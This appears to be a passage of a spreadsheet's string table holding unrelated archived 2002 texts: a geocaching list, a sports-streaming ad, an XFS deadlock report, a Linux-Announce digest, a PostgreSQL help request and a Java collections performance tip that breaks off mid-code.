http://www.geocaching.com/seek/cache_details.asp?ID=332189/22/2002 (Texas)
NTGA Organizational Meeting/Class by Wolf Song
(Event Cache) (GC81C1) (25.8 miles SW)
http://www.geocaching.com/seek/cache_details.asp?ID=332179/1/2002 (Texas)
Tiger's Den by Texas tiger
(Traditional Cache) (GC87D5) (33.14 miles SW)
http://www.geocaching.com/seek/cache_details.asp?ID=347738/31/2002 (Texas)
Hike It or Bike It by Zorro
(Multi-Cache) (GC874D) (41.81 miles S)
http://www.geocaching.com/seek/cache_details.asp?ID=346379/28/2002 (Texas)
DFW Field Day #1 by loubob57
(Event Cache) (GC8644) (47.92 miles W)
http://www.geocaching.com/seek/cache_details.asp?ID=343729/5/2002 (Texas)
Pirates Booty by Nitehawker
(Traditional Cache) (GC8A34) (50.51 miles SW)
http://www.geocaching.com/seek/cache_details.asp?ID=353809/2/2002 (Texas)
The Gates of First Monday by GeoVamp
(Virtual Cache) (GC8937) (54.01 miles SE)
http://www.geocaching.com/seek/cache_details.asp?ID=351279/2/2002 (Texas)
Dallas Bound I-20 Cache by GeoVamp
(Traditional Cache) (GC892E) (64.33 miles SE)
http://www.geocaching.com/seek/cache_details.asp?ID=351188/31/2002 (Texas)
Sleepy Hollow by Nuttdriver by Nuttdriver
(Traditional Cache) (GC8884) (71.17 miles SW)
http://www.geocaching.com/seek/cache_details.asp?ID=349489/4/2002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
</t>
  </si>
  <si>
    <t xml:space="preserve">
BIG 12 OR BUST
Â 
This
weekend you can see the Nebraska Cornhuskers, Utah State, Kansas
State and the University of Louisiana/Monroe - LIVE AND EXCLUSIVELY
ON THE INTERNET! FOXSports.com
presents BIG 12 football! Now you can see your favorite
teams play, even if you can't get to a live game or it's not
on TV.FOXSports.com has partnered with RealOne to bring Big 12 football
fans LIVE webcasts that put you in the stands - even from home.The best part... you can get ALL of the webcasts and exclusive
Big 12 news, highlights and coverage by becoming a member of
RealOne SuperPass. With SuperPass you get:
All
Big 12 webcasts, highlights and exclusive coverage
Unaired
video footage from FOX Sports and FOX Sports Net
Exclusive
video from channels like NASCAR.com and MLB.com
Plus,
top news content from ABCNews.com and CNN.com
True to your school? Only want certain games? You can get them individually too!
Sign up
now! Click
here.
Want more
details? Click
here.
To unsubscribe from future FOXSports.com emails, click
here.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi XFS developers,
When studying xfs code(2.4.19), I found that the inode will be locked by 
XFS_ILOCK_SHARE flags before we get acl, which may cause deadlock.
Because when getting acl, it will allocate memory in KM_SLEEP, If the 
memory is tight, the process will call xfs_strategy, and may 
lock(XFS_ILOCK_SHARE)the same inode again. If between these two locks, 
another process try to lock the inode by XFS_ILOCK_EXCL, these two 
processes  will be deadlock. As follows,    A process get ea                         B process want lock ipA1) xfs_ilock(ipA, XFS_ILOCK_SHARE)             .....................
            |                                         |
            |                                         |
         get acl                        2) xfs_ilock(ipA, XFS_ILOCK_EXCL)
            |                                         |
            |                                         |
        memory tight
            |
            |
        xfs_stragegy
            |
            |
3)xfs_ilock(ipA, XFS_ILOCK_SHARE)        ............................  these two processes will be dead lock.So I believe that acl allocation GFP_MASKshould be changed to KM_NOFS.
right?best regards
                                                 wdd
</t>
  </si>
  <si>
    <t xml:space="preserve">Linux-Announce Digest #180, Volume #4           Sat, 7 Sep 2002 22:13:03 EDTContents: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Noronha)----------------------------------------------------------------------------From: OOPList@BruceEckel.com
Subject: OO Programming Newsletter #41 from Bruce Eckel
Date: 8 Sep 2002 01:25:28 GMT
Reply-To: OOPList@BruceEckel.comTo unsubscribe send a blank email to leave-eckel-oo-programming-6394293J@earth.lyris.net
You are subscribed as linux-announce@sws1.ctd.ornl.gov 
To modify your email address, go to http://earth.lyris.net/cgi-bin/lyris.pl?enter=eckel-oo-programmingOO Programming Newsletter #41 from Bruce Eckel
August 2002=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saleSee the Calendar for the current schedule:
http://www.mindview.net/Calendar===================================
* Come work on Thinking in Java, 3rd edition, in Crested ButteAll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others.This should be a great learning experience and a fun time.===================================
* Thinking in Java, 3rd edition, Revision 2 ImminentThe second revision will be up on the site soon, at:
http://64.78.49.204/The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GUIs).The chapters have also been reorganized into something like their
final form, although the final chapter numbering hasn't been done
yet. We have made more progress in the testing system.Other details of the changes made in the new version will be at the
beginning of the book.The book is due at the end of October. The print version will
appear in December.===================================
* Thinking in C++, Volume 2, Revision 9 Available tomorrowAvailable at:
http://64.78.49.204/Chapters 1-4 are finished===================================
* Thinking in Java Hands-on Seminar
November 4th-8th in San Francisco - Emeryville, CA.
Registration opens on September 4th.
http://www.mindview.net/Seminars/ThinkingInJava/Created by Bruce Eckel, taught by Andrea Provaglio. We believe this
is the best in-depth introduction to Java that you'll find.  It's
based on the book "Thinking in Java," which was created as the
seminar evolved.Please note the early registration discount: 
* $1,600 for payments received by October 12th
* $1,950 for payments received after October 12th===================================
* Java2 Enterprise Programming Seminar
November 18th-22th in San Francisco - Emeryville, CA.
Registration opens on September 4th.
http://www.mindview.net/Seminars/J2EE/Created and taught by Andrea Provaglio, this seminar introduces you
to the practical development of real-world, Web-enabled,
distributed applications with Java. It covers J2EE and its key
technologies: Enterprise JavaBeans, Servlets, Java ServerPages, and
the basic architectural patterns used to combine these technologies
into maintainable applications. Andrea has been teaching this course in the US and in Europe for
the last two years, and he has recently restructured and updated
the seminar to include the latest J2EE features.You'll come out of this course with a comprehensive understanding
of the J2EE architecture, of the problems that it is designed to
solve, how to select the most appropriate tools, and how to code
your solutions.Please note the early registration discount: 
* $1,700 for payments received by October 26th
* $2,300 for payments received after October 26th===================================
* New seminarsBill Venners and I just finished giving the last "Objects &amp;
Patterns" seminar, and everyone (especially us) had a great time.We are now beginning to work towards the two new seminars spawned
by Objects &amp; Patterns, which Bill and I plan to teach together:
Design Patterns in Java
(Drawing primarily from "Thinking in Patterns")Designing Objects &amp; Systems
This will include a lot of material from Bill's upcoming book on
Object Design, along with coverage of UML, XP, Object-Oriented
Design techniques and guidelines, and of course exercises and
projects.We hope to begin teaching the courses early next year. Stay tuned.===================================
* Limited Number of Signed Copies of TIJ2 for saleI'm selling the last 17 of my author copies of Thinking in Java,
2nd edition. I've signed each one and drawn a little cartoon with
the signature (the books are in La Mesa, and I'm in Crested Butte,
so unfortunately I can't personalize them). The cost in the USA is
$40, which includes handling and mailing. Outside the USA, you'll
have to email to the address below to find out the additional
shipping cost.To order, divide your credit card number (Visa, MC, Amex) into two
different emails (not high security, but highly likely to be safe),
and include your credit card billing address and expiration date.
Email your order to:
Wayne@MindView.net
Wayne will email you back to clarify any necessary details.
___| Until Next Time... |________________________Computer nerd humor
http://www.valleyofthegeeks.com/Java programming questions:
http://www.mindview.net/Books/TIJ/JavaQuestions.htmlSpeaking &amp; Seminar schedule: 
http://www.mindview.net/Calendar/Anyone can sign up for this free newsletter by visiting:
http://www.mindview.net/mailman/listinfo/eckel-oo-programming Bruce Eckel    http://www.mindview.net
---
You are currently subscribed to eckel-oo-programming as: linux-announce@sws1.ctd.ornl.gov
To unsubscribe send a blank email to leave-eckel-oo-programming-6394293J@earth.lyris.net##########################################################################
# Send submissions for comp.os.linux.announce to: cola@stump.algebra.com #
# PLEASE remember a short description of the software and the LOCATION.  #
# This group is archived at http://stump.algebra.com/~cola/              #
##########################################################################
------------------------------From: Frederick Noronha 
Subject: The Linux Counter...
Date: 8 Sep 2002 01:25:32 GMTPlease sign-up at the Linux Counter:Please visit it and sign up (if you haven't already) at 
http://counter.li.org/Why?* It's a small way of saying 'thank you' to an excellent OS and
  acknowledging you find it useful... 
* Letting everyone out there know where all GNU/Linux is being used
* Building a useful database of GNU/Linux in your locality (Goa)
* Finding out where all other people in Goa are using GNU/Linux.
* Just seeing how this volunteer driven model builds itself by
  innovative styles of organising....FN##########################################################################
# Send submissions for comp.os.linux.announce to: cola@stump.algebra.com #
# PLEASE remember a short description of the software and the LOCATION.  #
# This group is archived at http://stump.algebra.com/~cola/              #
##########################################################################
------------------------------From: Linux Gazette 
Subject: Linux Gazette #82 (September 2002) available
Date: 8 Sep 2002 01:25:35 GMT
Reply-To: gazette@ssc.com"Linux Gazette...Making Linux just a little more fun!"Linux Gazette is a freely available, WWW e-zine that includes short articles
giving tips and tricks, ideas and suggestions for customizing and running
Linux. It is a member of the Linux Documentation Project.Linux Gazette issue #82, September 2002, is out and can be found at: 
  http://www.linuxgazette.com/For download purposes, individual issues of LG are available at:
  ftp://ftp.ssc.com/pub/lg/A list of mirror sites can be found at:
  http://www.linuxgazette.com/mirrors.htmlWhile we do not mail issues of LG to our readers--it's just too big--we do
have an announcement service. Write lg-announce-request@ssc.com with the
word subscribe in the body, and each month you will receive an e-mail notice
when we post Linux Gazette. Topics in this issue include:     * The MailBag
     * More 2-Cent Tips
     * The Answer Gang
     * News Bytes
     * Ecol , by Javier Malonda at escomposlinux.org
     * Qubism , by Jon "Sir Flakey" Harsem
     * Writing your own Toy OS - Part III , by Raghu and Chitkala
     * Kerberos: The watchdog of the Ether , by Raj Shekhar
     * My Guide To Digital Photography , by Rob Tougher
     * Adaptive Linux Firewalls , by Vasoo Veerapen
     * Multihead Systems under Linux and Windows , by Alan Ward
     * The Back PageRead all about it in Linux Gazette.Michael Orr
Editor, Linux Gazette##########################################################################
# Send submissions for comp.os.linux.announce to: cola@stump.algebra.com #
# PLEASE remember a short description of the software and the LOCATION.  #
# This group is archived at http://stump.algebra.com/~cola/              #
##########################################################################
------------------------------From: Bernard yap 
Subject: bigtwo: coffee.marilith.1 released
Date: 8 Sep 2002 01:25:38 GMTGreetings to all,'bigtwo' is an cross-platform (tho' it's meant to run on linux) object oriented
game engine for the card game of "cho dai di" with integrated artificial
intelligence to simplify the job of developing game servers/clients for the
card game.- Release [coffee.marilith.1] -    This is an alpha release of the game engine (codenamed 'coffee') intended for
    engine/AI testing. A simulation test of AI playing against each other and a
    simple text-based single player client are included in the release for that
    purpose.- ChangeLog -    o  some minor AI tweaks
    o  added game engine version information
    o  fixed bug in game initialization
    o  fixed bugs that blocked the straights 23456 &amp; A2345- Work in progress -    o  further fixes/improvements on the game engine/AI
    o  a cross-platform GUI/graphical client.- SF Project Page -
      http://sourceforge.net/projects/bigtwo/- Download -
      https://sourceforge.net/project/showfiles.php?group_id=22941
regards,-- 
const char *me[] = { "Bernard", "http://www.codenetic.net/" };pain, n.: One thing, at least it proves that you're alive!
##########################################################################
# Send submissions for comp.os.linux.announce to: cola@stump.algebra.com #
# PLEASE remember a short description of the software and the LOCATION.  #
# This group is archived at http://stump.algebra.com/~cola/              #
##########################################################################
------------------------------From: Frederick Noronha 
Subject: NEWS: GNU/DEVELOPMENT... intl orgns take a close look at GNU/Linux
Date: 8 Sep 2002 01:25:42 GMTGNU/DEVELOPMENT, INTERNATIONAL ORGANISATION TAKE A CLOSE LOOK AT GNU/LINUX&gt;From Frederick NoronhaINDIA: There's good news round the corner -- international organisations and
prominent networks worldwide are waking up to the rich potential of
Free/Open Source Software, a field that is slowly being recognised for the
immense promise it holds out to the Third World.But can this be tapped speedily enough and effectively? &gt;From the Unesco to the World Bank, and other global organisations, all are
catching up on the potential of using GNU/Linux as a potent tool in working
towards development. More so in countries where the cost of a proprietorial
office suite could eat up six months or more of the average citizen's
earnings.United Nation's Development Programme's Ms. Radhika Lal
, a Information-Communication Technology Policy
Advisor, recently drew attention to a conference on Open Source for
E-Government. It is to be held in Washington, DC on October 17-18.infoDev, the Cyberspace Policy Institute of The George Washington
University, and the UNDP are jointly behind this event. It is intended to
draw participants from local, national and international organizations from
both the public and private sector.This meet intends to present cases of 'best practices', raise awareness
about the potential of open source and free software for e-governance. More
importantly, it will be sharing experiences among policy makers, donors,
users and consumers, universities, and industry specialists in Open Source,
e-Government and related fields.Ms Lal works at the ICT-for-Development's Special Initiative Bureau for
Development Policy at the UNDP's East 45th Street offices in New York.ICT-for-development is a campaign to use more of infotech and the Internet
for global development and fighting problems like poverty and illiteracy.
But despite quite a few shared goals and concerns with the GNU/Linux world,
so far little networking has been done between these two separate circles.See http://www.egovos.org/OTHER ARMS OF THE U.N.
======================Besides, the UNDP, other arms of the United Nations are also known to be
showing increasing interest in the potential of free software/open source
tools. Paris-headquartered Unesco (United Nations Education, Scientific and
Cultural Organisation) recently launched its own Free Software portal. It's at http://www.unesco.org/webworld/portal_freesoft.UNESCO's Jean-Claude Dauphin  of the Information
Society Division also announced that this international organisation has
been looking out for contributors with a good knowledge of the Free Software
movement in relation with UNESCO fields of competence -- education, science
and culture.It zeroed in particularly on those coming from the Third World (also called
the 'South' countries) who could could make propositions for "revising,
updating and extending the UNESCO Free Software Portal" as well as for
including new basic documents. "This work could be done using a fee or consultant contract and the fee can
be discussed depending on the amount of work described in the contract,"
said Dauphin. Check out the sites atUNESCO Libraries Portal (http://www.unesco.org/webworld/portal_bib/)
UNESCO Archives Portal (http://www.unesco.org/webworld/portal_archives/)
UNESCO Free Software Portal (http://www.unesco.org/webworld/portal_freesoft/)
UNESCO Observatory on the Information Society (http://www.unesco.org/webworld/observatory/)NEW TOOLS FOR CDS/ISIS
======================Recently, Unesco also announced the launch of new tools for data exchange
from and to its CDS/ISIS software. These two new tools -- ImpExp2709 and
IsisAscii v 0.92 -- have recently been released for data exchange from and
to UNESCO's software package CDS/ISIS. CDS/ISIS is a generalized information storage and retrieval system that is
freely distributed, and has attracted users in places like libraries within
the Third World. The new utilities have been released with their source code
(GPL license). See http://www.unesco.org/webworld/news/2002/020806_isis.shtmlMeanwhile, UNDP's APDIP (Asia-Pacific Development Information Programme)
based in Kuala Lumpur, Malaysia, is also learnt to be thinking seriously
about organizing some kind of a consultation on open source, GNU/Linux and
related issues."We want to see how we can further this cause in the region," APDIP's Shahid
Akhtar told this correspondent.Niranjan Rajani , of Pakistani origin but based
in the birthplace of Linux, Finland, is now working on a research project on
"Significance of Free/OpenSource Software for Developing Countries".This project is financed by the Finnish Foreign Ministry, and he has
undertaken to write the paper by the end of November this year, for
Maailma.Net, a local division of OneWorld.Net.This project's goal is to find out, evaluate and analyze the extent of use
of FS/OSS, especially some of its most significant and popular projects;
GNU/Linux, Apache, Mozilla, OpenOffice etc. in the developing or Third World
countries. It will also look at its possible impact on economies, societies
and lives of these countries.CONVINCING GOVERNMENTS
======================In India, organisations like Red Hat have been putting out slick
presentations to convince governments and officials to try out Open Source. Shift over boldly to the world of 'open source' and 'free' software. That's
the message that governments across India were recently with, as official
computerisation efforts get bogged down due to spiraling software costs and
speedy software-fuelled hardware obsolence.Senior IT and e-governance officials from across the country tuned in
attentively during a recent seminar in Goa, as executives from computing
giant IBM and leading Linux systems supplier Red Hat India narrated long
lists of benefits that governments could get from going the Linux way.Pointing to examples from across the globe, Red Hat India argued that the US
Department of Energy has built supercomputers on GNU/Linux, the Chinese are
making Linux the official server operating system -- to be widely used in
varsities, military installations and within government. Some months back, an organisation under India's Ministry of Information
Technology -- called the ER&amp;DCI (Electronics Research and Development Centre
of India) -- entered into a strategic alliance with leading Linux systems
supplier Red Hat India to popularize the 'open source' solution in the
government sector.On networks like the EDC/World Bank-support GKD (Global Knowledge for
Development), issues of free software and open source often make it to the
news.GNU/Linux is a suitable tool in organising too, as it was recently pointed
out. (See http://www.lincproject.org)"The Low Income Networking and Communication (LINC) Project of the Welfare
Law Center has helped many low-income led organizing groups acquire access
to the Internet and use technology more effectively," says Dirk Slater
. While these groups have increased their abilities to communicate with one
another and their allies by using the Internet, one communication hurdle
remains -- communicating with their leadership via the Internet. Despite many "digital divide" initiatives addressing access to the Internet
in low-income communities, access is still an issue. Public Internet access points, such as libraries and schools, are not
sufficient, as Slater has pointed out. Many low-income leaders do not have
access to the Internet where it would make the most impact -- in their
homes. LINC argues that the need for Internet communication is particularly great
for rural groups whose members live far apart and cannot have frequent
face-to-face meetings because of distance, time and money constraints."We began to explore the idea of using Linux, a free operating system that
works well on older computers, when we learned of Microsoft's decision to
discontinue support of its older operating systems like Windows 95&lt;
according to Slater, who is 'senior circuit rider' for the Low-Income
Networking and Communications (LINC) Project at the Welfare Law Center.LINC protagonists say they had also been "troubled" by the frequent problems
that occur for Windows users just by having Windows run on its own. "Giving
a person who lives in a rural area an older computer with Windows seemed
like we were just asking for trouble. We also attempted to identify similar
projects but had limited success," says Slater. LINC wanted to increase its ability to provide stable desktop systems using
donated computers for board members and leaders of low-income led
organizations that LINC serves. "Our goal is to increase the ability of LINC Project partner groups to use
open-source software to support their organizing work. We also wanted to
document the project as much as we possibly could, so we could provide
details of our experiences for others doing similar projects," LINC
explains.LINC identified a partner in Grass Roots Organizing in Mexico, MO, and
installed GNU/Linux on 10 computers used as stand-alone workstations in
people's homes. GNU/Linux was also installed on a brand new stand-alone
computer to work as the main computer in the GRO office.Links were built with the Mizzou Linux Users Group for ongoing local
support."We still have a long way to go before we can call this a completely
successful project. After a period of a few months we will assess whether
the board members are actually using the computers to communicate more
effectively," said Slater.To view the daily journals on the project with GRO please visit the LINC
Project Linux pages at NEED TO NETWORK
===============Bala Pillai , who was earlier based in Malaysia and now in
Sydney-Australia, is founder of Tamil Innaiyam (http://www.tamil.net), an
organisation to promote the Tamil language worldwide. He points to the
impact GNU/Linux is making in some distant areas of the Third World.Says Pillai: "The most interactive open source/Linux community in our time
zone/Asia springs out of the Philippines. Primarily because the Filipino
psyche is a more secure psyche, a more self-confident psyche. "Folks who are self-confident worry about the future less, and allocate more
time diagnosing and solving problems rather than echoing and re-echoing it.
Filipinos are also more into sharing and online sharing -- we should look to
more symbiosis with them," says he. Pillai also notes that the Manila-based Miguel Paraz, whom he interacted
with since 1996, is a key catalyst in the Filipino Linux community.
"http://www.q-linux.com is a good starting point to get a feel for the key
Open Source catalysts in the Philippines," says he. Kuala Lumpur, Malaysia-based Dinesh who runs http://www.alphaque.com is
another lead Open Source catalyst from the region, explains Pillai. "Do look
for symbiosis opportunities there too," he suggests. "I see lots of room for us to symbiosis together. For example, there is
likely to be areas where we diagnosing, documenting, analyzing, coding or
publicizing where there is over-duplication. If we coordinated ourselves and
found out where our circles and priorities intersect , we could share this
work and get fruits out faster," he adds.
--
Frederick Noronha * Freelance Journalist * Goa * India 832.409490 / 409783
BYTESFORALL www.bytesforall.org  * GNU-LINUX http://linuxinindia.pitas.com
Email fred@bytesforall.org * Mobile +9822 122436 (Goa) * Saligao Goa India
Writing with a difference... on what makes *the* difference
##########################################################################
# Send submissions for comp.os.linux.announce to: cola@stump.algebra.com #
# PLEASE remember a short description of the software and the LOCATION.  #
# This group is archived at http://stump.algebra.com/~cola/              #
##########################################################################
------------------------------From: Frederick Noronha 
Subject: Attn programmers: support offered [FLOSS-Sarai Initiative]
Date: 8 Sep 2002 01:25:45 GMTDear friends,Can we manage to get some money into backing Free/Libre Open Source
Software initiatives, that would help young volunteers out there to
support their cash-strapped initiatives? Sarai.net, a Delhi-based initiative under the CSDS (Centre for the Study
of Developing Societies) has been solidly supportive of such an idea.Jeebesh Bagchi  sent in this offer recently. It could
surely be of help particularly to college students and others wanting to
make a break in Free Software/Open Source, but hamstrung by resources. It might help if projects are initially kept small and definitely 
workable, I guess. This is my own gut-level feeling, but maybe bigger
initiatives which are clearly workable could also prove convincing. If
such experiments prove useful, maybe there would be a good case for
greater support to free software/open source developers in regions like
ours. --FN
========== Forwarded message ==========The Sarai Programme, Centre for the Study of Developing Societies, Delhi
(www.sarai.net) invites applications for Support Grants to projects in the
area of Free Software, Open Source Software and Social Usage of SoftwareSarai invites programmers (practictioners as well as students) to
propose projects in the area of free and open source software applications
relevant to educational, social and community needs.  We are looking for
original ideas, as well as proposals to localize and adapt existing software
and applications to South Asian conditions,For example - Desktops in Hindi, Open Office and Gimp in Hindi. Lighter
versions of desktops like KDE, Innovations that creatively optimises older
lower configuration machines, Linux documentation in Hindi, games using local
context, etc.What is SaraiSarai is a public initiative of media practitioners and scholars looking at
media cultures and urban life. Sarai's interests are in the field of old and
new media, information and communication technologies, free software, cinema,
and urban space - its politics, built form, ecology, culture and history,
with a strong commitment to making knowledge available in the public domain.
It is a programme of the Centre for the Study of Developing Societies, Delhi.
For more information visit www.sarai.net. Sarai is committed to promoting the
free software and open source vision.Conditions:
Applicants should be resident in India, and should have a bank account in any
bank operating in India.These are support grants and grantees will be free to pursue their primary
occupations, if any.Mail your project proposal, workplan and CV to both the following addresses:
 with a copy to . Please mark
your subjectline 'FLOSS (Free/Libre Open Source Software) Initiative'. 
Also point out what you see as the relevance of your work, and how you
plan to share the resultant software once finalised.Enquires: dak@sarai.net
Last date for submission: October 15th, 2002.Note: Proposals from teams, partnerships, collectives, faculty are welcome,
so long as the grant amount is administered by a single individual, and the
funds are deposited in a single bank account in the name of an individual.=======================================================
##########################################################################
# Send submissions for comp.os.linux.announce to: cola@stump.algebra.com #
# PLEASE remember a short description of the software and the LOCATION.  #
# This group is archived at http://stump.algebra.com/~cola/              #
##########################################################################
------------------------------
** FOR YOUR REFERENCE **The service address, to which questions about the list itself and requests
to be added to or deleted from it should be directed, is:    Internet: Linux-Announce-Request@NEWS-DIGESTS.MIT.EDUYou can submit announcements to be moderated via:    Internet: linux-announce@NEWS.ORNL.GOVLinux may be obtained via one of these FTP sites:
    ftp.funet.fi				pub/Linux
    tsx-11.mit.edu				pub/linux
    sunsite.unc.edu				pub/LinuxEnd of Linux-Announce Digest
******************************
</t>
  </si>
  <si>
    <t>Hi all,I cannot to get this to run...  I think I am mistaking some basic concept or I have a big brain-lock .  Somebody know what is the problem to execute this function ?Thanks in advance...--====================================
DROP TABLE test;
CREATE TABLE test
(
  clave numeric(7,0) not null,
  PRIMARY KEY (clave)
) WITHOUT OIDS;
--====================================
DROP FUNCTION f_test(numeric(7,0), numeric(7,0));
CREATE OR REPLACE FUNCTION f_test(numeric(7,0), numeric(7,0)) RETURNS timestamp AS '
  DECLARE
    p_datod ALIAS FOR $1;
    p_datoh ALIAS FOR $2;
    --
    tdesde timestamp;
    thasta timestamp;
  BEGIN
    tdesde := now();
    --
    FOR X IN p_datod..p_datoh LOOP
      INSERT INTO test VALUES (x);    
    END LOOP;
    --
    thasta := now() - tdesde;
    RETURN thasta;
  COMMIT;
  END;
' LANGUAGE 'plpgsql';
--====================================
select f_test(1,9);---------------------------(end of broadcast)---------------------------
TIP 1: subscribe and unsubscribe commands go to majordomo@postgresql.org</t>
  </si>
  <si>
    <t>Core Java Technologies Technical TipsCODE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}Â Â Â View this issue as simple text
September 10, 2002Â Â Â Â 
In this IssueWELCOME to the Core JavaTM Technologies Tech Tips, September 10, 2002. Here you'll get tips on using core Java technologies and APIs, such as those in Java 2 Platform, Standard Edition (J2SETM).
Using ArrayList and LinkedListUsing Zero-Length Arrays
These tips were developed using Java 2 SDK, Standard Edition, v 1.4.
This issue of the JDC Tech Tips is written by Glen McCluskey.USING ARRAYLIST AND LINKEDLISTArrayList and LinkedList are two Collections classes used for storing lists of object references. For example, you could have an ArrayList of Strings, or a LinkedList of Integers. This tip compares the performance of ArrayList and LinkedList, and offers some suggestions about which of these classes is the right choice in a given situation.
The first key point is that an ArrayList is backed by a primitive Object array. Because of that, an ArrayList is much faster than a LinkedList for random access, that is, when accessing arbitrary list elements using the get method. Note that the get method is implemented for LinkedLists, but it requires a sequential scan from the front or back of the list. This scan is very slow. For a LinkedList, there's no fast way to access the Nth element of the list.
Consider the following example. Suppose you have a large list of sorted elements, either an ArrayList or a LinkedList. Suppose too that you do a binary search on the list. The standard binary search algorithm starts by checking the search key against the value in the middle of the list. If the middle value is too high, then the upper half of the list is eliminated. However, if the middle value is too low, then the lower half of the list is ignored. This process continues until the key is found in the list, or until the lower bound of the search becomes greater than the upper bound.
Here's a program that does a binary search on all the elements in an ArrayList or a LinkedList:
    import java.util.*;    public class ListDemo1 {
        static final int N = 10000;        static List values;        // make List of increasing Integer values        static {
           Integer vals[] = new Integer[N];           Random rn = new Random();           for (int i = 0, currval = 0; i &lt; N; i++) {
               vals[i] = new Integer(currval);
               currval += rn.nextInt(100) + 1;
           }           values = Arrays.asList(vals);
        }
        // iterate across a list and look up every
        // value in the list using binary search        static long timeList(List lst) {
            long start = System.currentTimeMillis();            for (int i = 0; i &lt; N; i++) {               // look up a value in the list 
               // using binary search               int indx = Collections.binarySearch(
                                   lst, values.get(i));               // sanity check for result 
               // of binary search               if (indx != i) {
                   System.out.println(
                                    "*** error ***\n");
               }
           }           return System.currentTimeMillis() - start;
       }       public static void main(String args[]) {           // do lookups in an ArrayList            System.out.println("time for ArrayList = " +
               timeList(new ArrayList(values)));           // do lookups in a LinkedList           System.out.println(
               "time for LinkedList = " +
               timeList(new LinkedList(values)));
       }
    }
The ListDemo1 program sets up a List of sorted Integer values. It then adds the values to an ArrayList or a LinkedList. Then Collections.binarySearch is used to search for each value in the 
list.
When you run this program, you should see a result that looks something like this:
    time for ArrayList = 31    time for LinkedList = 4640
ArrayList is about 150 times faster than LinkedList. (Your results might differ depending on your machine characteristics, but you should see a distinct difference in the result for ArrayList as compared to that for LinkedList. The same is true for the other programs in this tip.) Clearly, LinkedList is a bad choice in this situation. The binary search algorithm inherently uses random access, and LinkedList does not support fast random access. The time to do a random access in a LinkedList is proportional to the size of the list. By comparison, random access in an ArrayList has a fixed time.
You can use the RandomAccess marker interface to check whether a List supports fast random access:
    void f(List lst) {
        if (lst instanceof RandomAccess) {
            // supports fast random access
        }
    }
ArrayList implements the RandomAccess interface, and LinkedList. does not. Note that Collections.binarySearch does take advantage of the RandomAccess property, to optimize searches.
Do these results prove that ArrayList is always a better choice? Not necessarily. There are many cases where LinkedList does better. Also note that there are many situations where an algorithm can be implemented efficiently for LinkedList. An example is reversing a LinkedList using Collections.reverse. The internal algorithm does this, and gets reasonable performance, by using forward and backward iterators.
Let's look at another example. Suppose you have a list of elements, and you do a lot of element inserting and deleting to the list. In this case, LinkedList is the better choice. To demonstrate that, consider the following "worst case" scenario. In this demo, a program repeatedly inserts elements at the beginning of a list. The code looks like this:
    import java.util.*;    public class ListDemo2 {
        static final int N = 50000;        // time how long it takes to add 
        // N objects to a list        static long timeList(List lst) {
            long start = System.currentTimeMillis();            Object obj = new Object();            for (int i = 0; i &lt; N; i++) {
                lst.add(0, obj);
            }            return System.currentTimeMillis() - start;
        }        public static void main(String args[]) {            // do timing for ArrayList            System.out.println(
                "time for ArrayList = " +
                timeList(new ArrayList()));            // do timing for LinkedList            System.out.println(
                "time for LinkedList = " +
                timeList(new LinkedList()));
        }
    } 
When you run this program, the result should look something like this:
    time for ArrayList = 4859    time for LinkedList = 125
These results are pretty much the reverse of the previous example.
When an element is added to the beginning of an ArrayList, all of the existing elements must be pushed back, which means a lot of expensive data movement and copying. By contrast, adding an element to the beginning of a LinkedList simply means allocating an internal record for the element and then adjusting a couple of links. Adding to the beginning of a LinkedList has fixed cost, but adding to the beginning of an ArrayList has a cost that's proportional to the list size.
So far, this tip has looked at speed issues, but what about space? Let's look at some internal details of how ArrayList and LinkedList are implemented in Java 2 SDK, Standard Edition v 1.4. These details are not part of the external specification of these classes, but are illustrative of how such classes work internally.
The LinkedList class has a private internal class defined like this:
    private static class Entry {
        Object element;
        Entry next;
        Entry previous;
    } 
Each Entry object references a list element, along with the next and previous elements in the LinkedList -- in other words, a doubly-linked list. A LinkedList of 1000 elements will have 1000 Entry objects linked together, referencing the actual list elements. There is significant space overhead in a LinkedList structure, given all these Entry objects.
An ArrayList has a backing Object array to store the elements. This array starts with a capacity of 10. When the array needs to grow, the new capacity is computed as:
    newCapacity = (oldCapacity * 3) / 2 + 1;
Notice that the array capacity grows each time by about 50%. This means that if you have an ArrayList with a large number of elements, there will be a significant amount of space wasted at the end. This waste is intrinsic to the way ArrayList works. If there was no spare capacity, the array would have to be reallocated for each new element, and performance would suffer dramatically. Changing the growth strategy to be more aggressive (such as doubling the size at each reallocation) would result in slightly better performance, but it would waste more space.
If you know how many elements will be in an ArrayList, you can specify the capacity to the constructor. You can also call the trimToSize method after the fact to reallocate the internal array. This gets rid of the wasted space.
So far, this discussion has assumed that either an ArrayList or a LinkedList is "right" for a given application. But sometimes, other choices make more sense. For example, consider the very common situation where you have a list of key/value pairs, and you would like to retrieve a value for a given key.
You could store the pairs in an N x 2 Object array. To find the right pair, you could do a sequential search on the key values. This approach works, and is a useful choice for very small lists (say 10 elements or less), but it doesn't scale to big lists.
Another approach is to sort the key/value pairs by ascending key value, store the result in a pair of ArrayLists, and then do a binary search on the keys list. This approach also works, and is very fast. Yet another approach is to not use a list structure at all, but instead use a map structure (hash table), in the form of a HashMap.
Which is faster, a binary search on an ArrayList, or a HashMap? Here's a final example that compares these two:
    import java.util.*;    public class ListDemo3 {
        static final int N = 500000;        // Lists of keys and values        static List keys;
        static List values;        // fill the keys list with ascending order key 
        // values and fill the values list with
        // corresponding values (-key)        static {
            Integer keyvec[] = new Integer[N];
            Integer valuevec[] = new Integer[N];            Random rn = new Random();            for (int i = 0, currval = 0; i &lt; N; i++) {
                keyvec[i] = new Integer(currval);
                valuevec[i] = new Integer(-currval);
                currval += rn.nextInt(100) + 1;
            }            keys = Arrays.asList(keyvec);
            values = Arrays.asList(valuevec);
        }        // fill a Map with key/value pairs        static Map map = new HashMap();        static {
            for (int i = 0; i &lt; N; i++) {
                map.put(keys.get(i), values.get(i));
            }
        }        // do binary search lookup of all keys        static long timeList() {
            long start = System.currentTimeMillis();            for (int i = 0; i &lt; N; i++) {
                int indx = Collections.binarySearch(
                                    keys, keys.get(i));                // sanity check of returned value 
                // from binary search                if (indx != i) {
                    System.out.println(
                                    "*** error ***\n");
                }
            }            return System.currentTimeMillis() - start;
        }        // do Map lookup of all keys        static long timeMap() {
            long start = System.currentTimeMillis();            for (int i = 0; i &lt; N; i++) {
                Integer value = (Integer)map.get(
                                          keys.get(i));                // sanity check of value returned 
                // from map lookup                if (value != values.get(i)) {
                    System.out.println(
                                    "*** error ***\n");
                }
